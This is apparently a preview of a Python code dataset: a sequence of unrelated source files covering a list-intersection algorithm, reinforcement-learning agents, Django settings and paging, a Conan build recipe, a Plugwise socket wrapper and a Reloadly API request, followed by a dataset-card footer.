Since they are sorted we can have pointer i looking at array a and pointer j looking at array b and iterate through both,
which would be O(a) + O(b) = O(n) where n is the number of items in both arrays.
I'm not sure how to make the output constant space so I'll make the output O(intersection) but won't use any other space apart from that.
Another approach is to use sets, turn both arrays into a set and return the intersection, but that would use extra space.
"""
def intersection_extra_space(array_a, array_b):
    """Return the values common to both lists using set intersection (extra space)."""
    common = set(array_a).intersection(array_b)
    return list(common)
def intersection(array_a, array_b):
    """Return the sorted unique values present in both sorted input lists.

    Two-pointer scan: O(len(a) + len(b)) time, O(result) extra space.
    """
    i = 0
    j = 0
    last_num = None  # last value appended, used to skip duplicates
    output = []
    # Termination: once either list is exhausted nothing further can match.
    while i < len(array_a) and j < len(array_b):
        if array_a[i] == array_b[j]:
            if last_num != array_a[i]:  # Don't already have a copy of this.
                output.append(array_a[i])
                # Bug fix: the original only updated last_num when it was
                # falsy (None or 0), so later duplicate values (e.g. a
                # second run of 2s) could be appended twice.
                last_num = array_a[i]
            # Can increment both as we don't want dups.
            i += 1
            j += 1
        elif array_a[i] < array_b[j]:
            i += 1
        else:
            j += 1
    return output
if __name__ == "__main__":
    sample_a = [2, 3, 3, 4, 6, 6, 8]
    sample_b = [3, 3, 6, 7, 9]
    # Demonstrate both implementations on the example from the docstring.
    print(intersection_extra_space(sample_a, sample_b))
    print(intersection(sample_a, sample_b))
from dataclasses import astuple
import agent
import numpy as np
import torch
import torch.nn as nn
from agent import NNBase
from gym import Space
from gym.spaces import Box, Dict, Discrete, MultiDiscrete
from my.env import Obs
from transformers import CLIPModel
from utils import init
def get_size(space: Space):
    """Return the flattened size of a gym space (1 for Discrete)."""
    if isinstance(space, Discrete):
        return 1
    if isinstance(space, (Box, MultiDiscrete)):
        return int(np.prod(space.shape))
    raise TypeError()
class Agent(agent.Agent):
    """Agent whose observation space is an Obs-structured Dict."""

    def __init__(self, observation_space, **kwargs):
        structured = Obs(**observation_space.spaces)
        super().__init__(
            obs_shape=structured.image.shape,
            observation_space=observation_space,
            **kwargs,
        )

    def build_base(self, obs_shape, **kwargs):
        """Construct the network trunk; the image shape comes from kwargs' space."""
        return Base(**kwargs)
class ResidualBlock(nn.Module):
    """Pre-activation residual block: two ReLU+Conv layers plus a skip connection."""

    def __init__(self, channels: int):
        super().__init__()

        def conv():
            # 3x3 same-padded conv preserving the channel count and spatial size.
            return nn.Conv2d(
                channels, channels, kernel_size=(3, 3), stride=(1, 1), padding="same"
            )

        self.net = nn.Sequential(nn.ReLU(), conv(), nn.ReLU(), conv())

    def forward(self, x):
        """Return the residual sum of the input and the block's output."""
        return self.net(x) + x
class Base(NNBase):
    """Recurrent actor-critic trunk fusing an image encoding with a mission encoding.

    The image branch is either a pretrained CLIP vision tower (mostly frozen)
    or a conv net (small DQN-style or larger residual variant); the mission
    branch is either precomputed embeddings (gpt_embeddings) or a locally
    trained EmbeddingBag. Both encodings are concatenated and fed to a GRU.
    """

    def __init__(
        self,
        clip: bool,
        gpt_embeddings: bool,
        hidden_size: int,
        image_size: int,
        observation_space: Dict,
        recurrent: bool,
        large_architecture: bool,
        train_ln: bool,
        train_wpe: bool,
    ):
        # Structured (image, mission, ...) view of the observation Dict.
        self.observation_spaces = Obs(**observation_space.spaces)
        if gpt_embeddings:
            # Mission observations already are embeddings; use their last-dim width.
            *_, self.mission_size = self.observation_spaces.mission.shape
        else:
            # Otherwise mission tokens are embedded locally into 2048-dim vectors.
            self.mission_size = 2048
        super().__init__(
            recurrent=recurrent,
            recurrent_input_size=image_size + self.mission_size,
            hidden_size=hidden_size,
        )
        self.clip = clip
        self.train_wpe = train_wpe
        self.train_ln = train_ln
        self.embeddings = None if gpt_embeddings else self.build_embeddings()
        image_shape = self.observation_spaces.image.shape
        d, h, w = image_shape
        if clip:
            # Replace the boolean flag with the pretrained model itself; later
            # code relies on `if self.clip:` being truthy for a module instance.
            self.clip: CLIPModel = CLIPModel.from_pretrained(
                "openai/clip-vit-base-patch32"
            )
            # Freeze the CLIP vision tower except, optionally, position
            # embeddings (train_wpe) and/or layer norms (train_ln).
            for name, p in self.clip.vision_model.named_parameters():
                requires_grad = (self.train_wpe and "position_embedding" in name) or (
                    self.train_ln and "layer_norm" in name
                )
                p.requires_grad_(requires_grad)
        else:

            def get_image_net():
                # Yield the conv-encoder layers, ending with Flatten.
                prev = d
                if not large_architecture:
                    # Small variant: two strided convolutions.
                    for (num_ch, kernel_size, stride) in [
                        (16, 8, 4),
                        (32, 4, 2),
                    ]:  # Downscale.
                        yield nn.Conv2d(
                            prev, num_ch, kernel_size=kernel_size, stride=stride
                        )
                        yield nn.ReLU()
                        prev = num_ch
                else:
                    # Large variant: conv + maxpool stages with residual blocks.
                    for (num_ch, num_blocks) in [
                        (16, 2),
                        (32, 2),
                        (32, 2),
                    ]:  # Downscale.
                        yield nn.Conv2d(prev, num_ch, kernel_size=(3, 3), stride=(1, 1))
                        yield nn.MaxPool2d(
                            kernel_size=(3, 3),
                            stride=[2, 2],
                        )
                        # Residual block(s).
                        for _ in range(num_blocks):
                            yield ResidualBlock(num_ch)
                        prev = num_ch
                    yield nn.ReLU()
                yield nn.Flatten()

            self._image_net = nn.Sequential(*get_image_net())
        # Probe the image branch with a dummy input to size the projection layer.
        dummy_input = torch.zeros(1, d, h, w)
        output = self.image_net(dummy_input)
        self.image_linear = nn.Sequential(
            nn.Linear(output.size(-1), image_size), nn.ReLU()
        )
        self._hidden_size = hidden_size
        self._recurrent = recurrent
        self.initial_hxs = nn.Parameter(self._initial_hxs)
        # Orthogonal weight init with zero bias for the value head.
        init_ = lambda m: init(
            m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0)
        )
        self.critic_linear = init_(nn.Linear(hidden_size, 1))

    def image_net(self, image: torch.Tensor):
        """Encode images with CLIP (mean-pooled hidden states) or the conv net."""
        if self.clip:
            state = self.clip.vision_model(pixel_values=image).last_hidden_state
            return state.mean(1)
        return self._image_net(image)

    def build_embeddings(self):
        """Create an EmbeddingBag large enough for every mission token id."""
        num_embeddings = self.observation_spaces.mission.high.max()
        return nn.EmbeddingBag(int(num_embeddings) + 1, self.mission_size)

    def embed(self, inputs):
        """Embed mission token ids, or pass through precomputed embeddings."""
        if self.embeddings is not None:
            return self.embeddings.forward(inputs.long())
        return inputs

    def forward(self, inputs, rnn_hxs, masks):
        # Split the flat observation vector back into its named components.
        inputs = Obs(
            *torch.split(
                inputs,
                [get_size(space) for space in astuple(self.observation_spaces)],
                dim=-1,
            )
        )
        image = inputs.image.reshape(-1, *self.observation_spaces.image.shape)
        image = self.image_net(image)
        image = self.image_linear(image)
        mission = inputs.mission.reshape(-1, *self.observation_spaces.mission.shape)
        n, l, e = mission.shape
        # Embed each mission token, then mean-pool over the token dimension.
        flattened = mission.reshape(n * l, e)
        states = self.embed(flattened)
        states = states.reshape(n, l, -1)
        mission = states.mean(1)
        x = torch.cat([image, mission], dim=-1)
        assert self.is_recurrent
        x, rnn_hxs = self._forward_gru(x, rnn_hxs, masks)
        return self.critic_linear(x), x, rnn_hxs
|
import argparse
import os
import sys
import zipfile
def parse_args(args_list):
    """Parse input arguments."""
    parser = argparse.ArgumentParser(description='install cudnn')
    parser.add_argument('zipfile', help='downloaded cudnn zip file')
    return parser.parse_args(args_list)
def main(args_list):
    """Extract the given cudnn zip archive into the ./cudnn directory."""
    args = parse_args(args_list)
    print('Installing cudnn...')
    with zipfile.ZipFile(args.zipfile) as archive:
        archive.extractall('cudnn')
    print('Done.')
if __name__ == '__main__':
    # Forward CLI arguments (minus the program name) to main().
    main(sys.argv[1:])
|
"""Configuring Django Mutadi app for Heroku"""
import django_heroku
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
from .base import *
# Secrets and hosts come from the environment; a missing variable fails fast.
SECRET_KEY = os.environ["DJANGO_SECRET_KEY"]
DEBUG = False
ALLOWED_HOSTS = [os.environ["DJANGO_ALLOWED_HOSTS"]]
# Only send CSRF and session cookies over HTTPS.
CSRF_COOKIE_SECURE = True
SESSION_COOKIE_SECURE = True
# HTTP Strict Transport Security: ~6 months, including subdomains, preloadable.
SECURE_HSTS_SECONDS = 15768000
SECURE_HSTS_INCLUDE_SUBDOMAINS = True
SECURE_HSTS_PRELOAD = True
# Browser-side hardening headers (XSS filter, no MIME sniffing).
SECURE_BROWSER_XSS_FILTER = True
SECURE_CONTENT_TYPE_NOSNIFF = True
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
# Redirect all plain-HTTP requests to HTTPS.
SECURE_SSL_REDIRECT = True
# Error reporting to Sentry with full performance tracing.
sentry_sdk.init(
    dsn=os.environ["SENTRY_DSN"],
    integrations=[DjangoIntegration()],
    traces_sample_rate=1.0,
    # If you wish to associate users to errors (assuming you are using
    # django.contrib.auth) you may enable sending PII data.
    send_default_pii=True,
)
# Activate Django-Heroku.
django_heroku.settings(locals())
|
import os
from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
required_conan_version = ">=1.33.0"
class LibBasisUniversalConan(ConanFile):
    """Conan recipe for Basis Universal, a supercompressed GPU texture codec."""
    name = "libbasisu"
    description = "Basis Universal Supercompressed GPU Texture Codec"
    homepage = "https://github.com/BinomialLLC/basis_universal"
    topics = ("conan", "basis", "textures", "compression")
    url = "https://github.com/conan-io/conan-center-index"
    license = "Apache-2.0"
    exports_sources = ["CMakeLists.txt", "patches/*"]
    generators = "cmake"
    settings = "os", "compiler", "build_type", "arch"
    options = {
        "fPIC": [True, False],
        "shared": [True, False],
        "use_sse4": [True, False],
        "with_zstd": [True, False],
        "enable_encoder": [True, False],
        "custom_iterator_debug_level": [True, False]
    }
    default_options = {
        "fPIC": True,
        "shared": False,
        "use_sse4": False,
        "with_zstd": True,
        "enable_encoder": True,
        "custom_iterator_debug_level": False
    }
    # Cached CMake helper built lazily by _configure_cmake().
    _cmake = None

    @property
    def _source_subfolder(self):
        return "source_subfolder"

    @property
    def _build_subfolder(self):
        return "build_subfolder"

    def _use_custom_iterator_debug_level(self):
        # The option only exists for Visual Studio (deleted otherwise in
        # config_options), so fall back to the recipe default elsewhere.
        return self.options.get_safe("custom_iterator_debug_level", default=self.default_options["custom_iterator_debug_level"])

    def config_options(self):
        if self.settings.os == "Windows":
            del self.options.fPIC
        if self.settings.compiler != "Visual Studio":
            del self.options.custom_iterator_debug_level

    def _minimum_compiler_version(self) -> dict:
        # Minimum supported version per compiler (original annotation said
        # `bool`, but a dict is returned).
        return {
            "Visual Studio": "15",
            "gcc": "5.4",
            "clang": "3.9",
            "apple-clang": "10"
        }

    def validate(self):
        """Warn on unknown compilers, reject known-too-old ones, require C++11."""
        min_version = self._minimum_compiler_version().get(str(self.settings.compiler))
        if not min_version:
            self.output.warn("{} recipe lacks information about the {} compiler support.".format(
                self.name, self.settings.compiler))
        elif tools.Version(self.settings.compiler.version) < min_version:
            raise ConanInvalidConfiguration("{} {} does not support compiler with version {} {}, minimum supported compiler version is {} ".format(self.name, self.version, self.settings.compiler, self.settings.compiler.version, min_version))
        if self.settings.compiler.get_safe("cppstd"):
            tools.check_min_cppstd(self, 11)

    def configure(self):
        # fPIC is meaningless for shared builds.
        if self.options.shared:
            del self.options.fPIC

    def source(self):
        tools.get(**self.conan_data["sources"][self.version], strip_root=True, destination=self._source_subfolder)

    def _configure_cmake(self):
        # Configure CMake once and cache the helper for build()/package().
        if self._cmake:
            return self._cmake
        self._cmake = CMake(self)
        self._cmake.definitions["SSE4"] = self.options.use_sse4
        self._cmake.definitions["ZSTD"] = self.options.with_zstd
        self._cmake.definitions["ENABLE_ENCODER"] = self.options.enable_encoder
        self._cmake.definitions["NO_ITERATOR_DEBUG_LEVEL"] = not self._use_custom_iterator_debug_level()
        self._cmake.configure(build_folder=self._build_subfolder)
        return self._cmake

    def build(self):
        # Apply any conandata patches for this version before building.
        for patch in self.conan_data.get("patches", {}).get(self.version, []):
            tools.patch(**patch)
        cmake = self._configure_cmake()
        cmake.build()

    def package(self):
        """Copy license, public headers and built libraries into the package."""
        self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
        self.copy("*.h", dst=os.path.join("include", self.name, "transcoder"), src=os.path.join(self._source_subfolder, "transcoder"))
        if self.options.enable_encoder:
            self.copy("*.h", dst=os.path.join("include", self.name, "encoder"), src=os.path.join(self._source_subfolder, "encoder"))
        self.copy(pattern="*.a", dst="lib", keep_path=False)
        self.copy(pattern="*.so", dst="lib", keep_path=False)
        self.copy(pattern="*.dylib*", dst="lib", keep_path=False)
        self.copy(pattern="*.lib", dst="lib", keep_path=False)
        self.copy(pattern="*.dll", dst="bin", keep_path=False)

    def package_info(self):
        """Declare libraries, include dirs, system libs and compile definitions."""
        self.cpp_info.libs = tools.collect_libs(self)
        self.cpp_info.names["cmake_find_package"] = self.name
        self.cpp_info.names["cmake_find_package_multi"] = self.name
        self.cpp_info.includedirs = ["include", os.path.join("include", self.name)]
        if self.settings.os == "Linux":
            self.cpp_info.system_libs = ["m", "pthread"]
        self.cpp_info.defines.append("BASISU_NO_ITERATOR_DEBUG_LEVEL={}".format("1" if self._use_custom_iterator_debug_level() else "0"))
|
from core import MLPActorCritic
import numpy as np
import torch
from torch.distributions import Normal
import torch.nn as nn
from torch.nn.modules import activation
from torch.nn import MSELoss
from torch.optim import Adam
import gym
import math
from skimage.transform import resize
from copy import deepcopy
# Hyperparameters and environment setup for the DDPG script.
# BipedalWalker-v3
pi_lr = 1e-3  # actor learning rate
qf_lr = 1e-3  # critic learning rate
# LunarLanderContinuous-v2
env = gym.make('BipedalWalker-v3').unwrapped
action_dim = env.action_space.shape[0]
state_dim = env.observation_space.shape[0]
act_limit = env.action_space.high[0]  # symmetric action bound
episode_steps_num = 4000   # env steps collected per outer episode
episode_iters_num = 1000   # number of outer episodes
max_steps_per_game = 500   # per-game step cap before forced termination
train_iters_num = 50       # gradient updates per training round
clip_ratio = 0.2  # NOTE(review): unused below — presumably a PPO leftover
height = 100
width = 100
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
device = 'cpu'  # NOTE(review): this overrides the CUDA device chosen above
target_kl = 0.01
print('workon', device)
gamma = 0.99   # discount factor
polyak = 0.99  # target-network averaging coefficient
update_after = 1000  # env steps collected before learning starts
print(act_limit)
print(state_dim)
print(action_dim)
class Buffer:
    """Fixed-capacity circular replay buffer backed by numpy arrays."""

    def __init__(self, state_dim, action_dim, capactiy):
        # Preallocate flat storage. `capactiy` keeps the original (misspelled)
        # parameter name for backward compatibility with keyword callers.
        self.states = np.zeros((capactiy, state_dim))
        self.next_states = np.zeros((capactiy, state_dim))
        self.actions = np.zeros((capactiy, action_dim))
        self.rewards = np.zeros(capactiy)
        self.dones = np.zeros(capactiy)
        self.capactiy = capactiy
        self.current_index = 0  # next slot to write (wraps around)
        self.current_size = 0   # number of valid entries, <= capactiy

    def store(self, state, next_state, action, reward, done):
        """Insert one transition, overwriting the oldest entry when full."""
        self.states[self.current_index] = state
        self.next_states[self.current_index] = next_state
        self.actions[self.current_index] = action
        self.rewards[self.current_index] = reward
        self.dones[self.current_index] = done
        self.current_index = (self.current_index + 1) % self.capactiy
        self.current_size = min(self.current_size + 1, self.capactiy)

    def __len__(self):
        # Bug fix: the original returned len(self.memory), but no `memory`
        # attribute exists, so len(buffer) always raised AttributeError.
        return self.current_size

    def batch(self, batch_size=128):
        """Sample a random batch (with replacement) of stored transitions."""
        assert batch_size <= self.current_size
        indexs = np.random.randint(0, self.current_size, size=batch_size)
        batch = {'states': self.states[indexs],
                 'next_states': self.next_states[indexs],
                 'actions': self.actions[indexs],
                 'rewards': self.rewards[indexs],
                 'dones': self.dones[indexs]}
        return batch
class Mlp(nn.Module):
    """Four-layer fully connected network with ReLU hidden activations."""

    def __init__(self, state_dim, action_dim, mid_n, out_activation=nn.Identity) -> None:
        super().__init__()
        layers = [
            nn.Linear(state_dim, mid_n), nn.ReLU(),
            nn.Linear(mid_n, mid_n), nn.ReLU(),
            nn.Linear(mid_n, mid_n), nn.ReLU(),
            nn.Linear(mid_n, action_dim), out_activation(),
        ]
        self.net = nn.Sequential(*layers)

    def forward(self, x):
        """Apply the network to a batch of inputs."""
        return self.net(x)
class Agent:
    """DDPG agent: deterministic actor `pi` and Q-critic `qf`, each with a
    Polyak-averaged target copy.

    Relies on module-level hyperparameters: pi_lr, qf_lr, gamma, polyak,
    act_limit, action_dim.
    """

    def __init__(self, state_dim, action_dim) -> None:
        self.pi = Mlp(state_dim, action_dim, 64, nn.Tanh)
        self.qf = Mlp(state_dim + action_dim, 1, 64)
        self.pi_target = deepcopy(self.pi)
        self.qf_target = deepcopy(self.qf)
        self.pi_optim = Adam(self.pi.parameters(), lr=pi_lr)
        self.qf_optim = Adam(self.qf.parameters(), lr=qf_lr)

    def step(self, state, noise_scale):
        """Return a clipped action: actor output plus Gaussian exploration noise."""
        with torch.no_grad():
            state = torch.FloatTensor(state)
            action = act_limit * self.pi(state).numpy()
            action += noise_scale * np.random.randn(action_dim)
        return np.clip(action, -act_limit, act_limit)

    def learn(self, batch):
        """Run one DDPG update on a sampled batch; return (pi_loss, qf_loss)."""
        states = torch.FloatTensor(batch['states'])
        next_states = torch.FloatTensor(batch['next_states'])
        actions = torch.FloatTensor(batch['actions'])
        rewards = torch.FloatTensor(batch['rewards'])
        dones = torch.BoolTensor(batch['dones'])
        # Critic update: regress Q(s, a) onto the bootstrapped TD target.
        q_value = self.qf(torch.cat([states, actions], dim=-1))
        with torch.no_grad():
            q_next_value = self.qf_target(torch.cat([next_states, self.pi_target(next_states)], dim=-1))
            q_next_value[dones] = 0  # no bootstrapping past terminal states
            q_target_value = rewards.unsqueeze(-1) + gamma * q_next_value
        qf_loss = MSELoss()(q_target_value, q_value)
        self.qf_optim.zero_grad()
        qf_loss.backward()
        self.qf_optim.step()
        # Actor update: maximize Q(s, pi(s)). Freeze the critic so only the
        # actor receives gradients from this loss.
        for param in self.qf.parameters():
            param.requires_grad = False
        # Bug fix: the original evaluated the policy loss on `next_states`;
        # the DDPG policy gradient is taken over the sampled states `s`.
        pi_loss = -self.qf(torch.cat([states, self.pi(states)], dim=-1)).mean()
        self.pi_optim.zero_grad()
        pi_loss.backward()
        self.pi_optim.step()
        for param in self.qf.parameters():
            param.requires_grad = True
        # Polyak-average both target networks toward the online networks.
        with torch.no_grad():
            for param, param_target in zip(self.qf.parameters(), self.qf_target.parameters()):
                param_target.data.mul_(polyak)
                param_target.data.add_((1 - polyak) * param.data)
            for param, param_target in zip(self.pi.parameters(), self.pi_target.parameters()):
                param_target.data.mul_(polyak)
                param_target.data.add_((1 - polyak) * param.data)
        return pi_loss.item(), qf_loss.item()
# Main training loop: collect transitions, periodically update, and every 40
# episodes run a rendered evaluation rollout without exploration noise.
agent = Agent(state_dim, action_dim)
buffer = Buffer(state_dim, action_dim, int(1e6))
pi_loss_list = []
qf_loss_list = []
return_list = []
for episode_i in range(episode_iters_num):
    state = env.reset()
    total_reward = 0
    step_index = 0  # steps inside the current game (reset on done)
    for step_i in range(episode_steps_num):
        action = agent.step(state, 0.3)
        next_state, reward, done, _ = env.step(action)
        # Force-terminate games that run past the per-game step cap.
        if(step_index == max_steps_per_game - 1):
            done = True
        buffer.store(state, next_state, action, reward, done)
        state = next_state
        total_reward += reward
        step_index += 1
        if done:
            state = env.reset()
            return_list.append(total_reward)
            total_reward = 0
            step_index = 0
        # After the warm-up period, run a batch of updates periodically.
        if step_i >= update_after and step_i % train_iters_num == 0:
            for i in range(train_iters_num):
                pi_loss, qf_loss = agent.learn(buffer.batch())
                pi_loss_list.append(pi_loss)
                qf_loss_list.append(qf_loss)
    if(episode_i % 40 == 0 and episode_i != 0):
        # Evaluation rollout: greedy policy (no noise), rendered.
        state = env.reset()
        total_reward = 0
        for step_i in range(max_steps_per_game):
            action = agent.step(state, 0)
            state, reward, done, _ = env.step(action)
            env.render()
            # Bug fix: the original tested the stale training-loop variable
            # `step_index` here; the evaluation loop counter is `step_i`.
            if(step_i == max_steps_per_game - 1):
                done = True
            total_reward += reward
            if done:
                print('test | return: {}'.format(total_reward))
                break
    if(episode_i % 1 == 0):
        # NOTE(review): these lists can be empty before update_after is
        # reached, so np.mean may print nan with a RuntimeWarning.
        print('episode {}| pi_loss {} qf_loss {} return {}'.format(
            episode_i,
            format(np.mean(pi_loss_list), '.3f'),
            format(np.mean(qf_loss_list), '.3f'),
            format(np.mean(return_list), '.2f')))
        pi_loss_list = []
        qf_loss_list = []
        return_list = []
|
from django.conf import settings
from . import models
def init_paging_details(page_number):
    """Build a PagingDetails for the given 1-based page number with empty links."""
    page_size = settings.PAGE_SIZE
    first_record = (page_number - 1) * page_size
    return models.PagingDetails(
        page_number=page_number,
        start_record=first_record,
        end_record=first_record + page_size,
        prev_page="",
        next_page="",
    )
def set_paging_links(paging, url):
    """Fill in the prev/next page URLs on a PagingDetails object in place."""
    items_on_page = paging.end_record - paging.start_record
    # A full page suggests more records may follow.
    if items_on_page >= settings.PAGE_SIZE:
        paging.next_page = "{}?pageNo={}".format(url, paging.page_number + 1)
    if paging.page_number > 1:
        paging.prev_page = "{}?pageNo={}".format(url, paging.page_number - 1)
|
"""
Use of this source code is governed by the MIT license found in the LICENSE file.
Socket connection
"""
import time
import threading
import logging
from queue import Queue
import socket
from plugwise.constants import SLEEP_TIME
from plugwise.connections.connection import StickConnection
from plugwise.message import PlugwiseMessage
from plugwise.util import PlugwiseException
class SocketConnection(StickConnection):
    """
    Wrapper for Socket connection configuration
    """

    def __init__(self, device, stick=None):
        """Connect to `device` ("<host>:<port>") and start reader/writer threads."""
        StickConnection.__init__(self)
        self.logger = logging.getLogger("plugwise")
        self._device = device
        self.stick = stick
        # get the address from a <host>:<port> format
        addr = device.split(":")
        addr = (addr[0], int(addr[1]))
        try:
            self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self._socket.connect(addr)
        except Exception:
            self.logger.error(
                "Could not open socket, \
                no messages are read or written to the bus"
            )
            # Bug fix: the original raised the undefined name
            # `plugwiseException` (a NameError); the imported class is
            # `PlugwiseException`.
            raise PlugwiseException("Could not open socket port")
        # build a read thread
        self._listen_process = threading.Thread(
            None, self.read_daemon, "plugwise-process-reader", (), {}
        )
        self._listen_process.daemon = True
        self._listen_process.start()
        # build a writer thread
        self._write_queue = Queue()
        self._write_process = threading.Thread(
            None, self.write_daemon, "plugwise-connection-writer", (), {}
        )
        self._write_process.daemon = True
        self._write_process.start()

    def stop_connection(self):
        """Close the socket."""
        self.logger.warning("Stop executed")
        try:
            self._socket.close()
        except Exception:
            self.logger.error("Error while closing socket")
            # Bug fix: same undefined-name problem as in __init__.
            raise PlugwiseException("Error while closing socket")
        time.sleep(1)

    def feed_parser(self, data):
        """Parse received message."""
        assert isinstance(data, bytes)
        self.stick.feed_parser(data)

    def send(self, message, callback=None):
        """Add message to write queue."""
        assert isinstance(message, PlugwiseMessage)
        self._write_queue.put_nowait((message, callback))

    def read_daemon(self):
        """Read thread: forward everything received on the socket to the parser."""
        while True:
            data = self._socket.recv(9999)
            self.feed_parser(data)

    def write_daemon(self):
        """Write thread: serialize queued messages onto the socket, then run
        the optional per-message callback."""
        while True:
            (message, callback) = self._write_queue.get(block=True)
            self.logger.info("Sending message on USB bus: %s", str(message))
            # NOTE(review): logged at error level although it is not an
            # error — presumably should be debug; behavior left unchanged.
            self.logger.error("Sending binary message: %s", str(message.serialize()))
            self._socket.send(message.serialize())
            time.sleep(SLEEP_TIME)
            if callback:
                callback()
|
import requests

# Fetch the Reloadly gift-card transactions report for a fixed date window.
url = "https://giftcards.reloadly.com/reports/transactions?startDate=2021-06-01 00:00:00&endDate=2021-06-18 23:17:02"

payload = {}
headers = {
    'Authorization': 'Bearer eyJraXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
    'Content-Type': 'application/json',
    'Accept': 'application/com.reloadly.giftcards-v1+json',
}

response = requests.get(url, headers=headers, data=payload)

print(response.text)
End of preview. Expand
in Dataset Viewer.
Small Python Stack
This dataset contains a random sample of 20% of the Python code available in the original Stack.
- Downloads last month
- 56